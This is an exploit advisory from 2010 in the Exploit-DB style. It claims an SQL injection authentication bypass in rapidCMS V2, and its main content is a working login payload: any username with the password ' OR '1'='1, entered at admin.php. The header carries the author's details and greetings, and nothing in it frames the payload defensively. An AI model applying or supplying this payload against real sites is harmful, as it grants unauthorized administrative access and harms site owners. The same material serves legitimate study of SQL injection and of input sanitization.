rapidCMS version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
105eb671688b0faa0724dce67c0ff13d418ecc793007a265b52e5a7930e3f72a
# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux
* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon
----------------------------------------------------------
Exploit Authentication Bypass:
User: something
Pass: ' OR '1'='1
----------------------------------------------------------
Demo :
http://site.tld/admin.php
----------------------------------------------------------